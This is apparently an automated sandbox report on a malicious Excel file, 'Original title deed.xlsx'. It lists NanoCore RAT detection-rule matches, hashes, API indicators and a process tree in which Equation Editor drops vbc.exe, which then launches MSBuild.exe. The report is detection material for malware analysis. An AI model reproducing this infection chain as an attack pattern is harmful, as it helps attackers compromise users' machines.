Source: Process Memory Space: MSBuild.exe PID: 2544, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: MSBuild.exe PID: 2544, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: MSBuild.exe PID: 2872, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: MSBuild.exe PID: 2872, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: vbc.exe PID: 2780, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: vbc.exe PID: 2780, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 24.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 24.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 24.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 20.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 20.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 20.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 8.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.vbc.exe.27a0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.vbc.exe.27a0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.vbc.exe.27a0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 18.2.vbc.exe.1e90000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.vbc.exe.1e90000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.vbc.exe.1e90000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 28.2.vbc.exe.5f0000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 28.2.vbc.exe.5f0000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 28.2.vbc.exe.5f0000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 32.2.vbc.exe.2870000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 32.2.vbc.exe.2870000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 32.2.vbc.exe.2870000.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.2.vbc.exe.2750000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.vbc.exe.2750000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.vbc.exe.2750000.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 26.2.vbc.exe.2750000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 26.2.vbc.exe.2750000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 26.2.vbc.exe.2750000.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 22.2.vbc.exe.27c0000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 22.2.vbc.exe.27c0000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 22.2.vbc.exe.27c0000.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 23.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 23.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 23.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 22.2.vbc.exe.27c0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 22.2.vbc.exe.27c0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 22.2.vbc.exe.27c0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.vbc.exe.2830000.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.vbc.exe.2830000.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.vbc.exe.2830000.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 18.2.vbc.exe.1e90000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.vbc.exe.1e90000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.vbc.exe.1e90000.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: 4.2.vbc.exe.30a0000.8.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 4.2.vbc.exe.30a0000.8.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.vbc.exe.30a0000.8.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.2.MSBuild.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.MSBuild.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.vbc.exe.2830000.7.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 6.2.vbc.exe.2830000.7.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.vbc.exe.2830000.7.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 8.2.vbc.exe.2860000.7.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 8.2.vbc.exe.2860000.7.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 5.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 7.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 7.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 6.2.vbc.exe.2830000.7.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 6.2.vbc.exe.2830000.7.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.vbc.exe.30a0000.8.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 4.2.vbc.exe.30a0000.8.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 9.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 9.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: vbc.exe, 00000006.00000002.2177181364.0000000002B90000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192380322.0000000002BC0000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.rans.troj.expl.evad.winXLSX@65/72@1/1

Source: C:\Users\Public\vbc.exe

4_2_00403461

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0040473E GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

4_2_0040473E

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0040216B CoCreateInstance,MultiByteToWideChar,

4_2_0040216B

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Original title deed.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE3AA.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
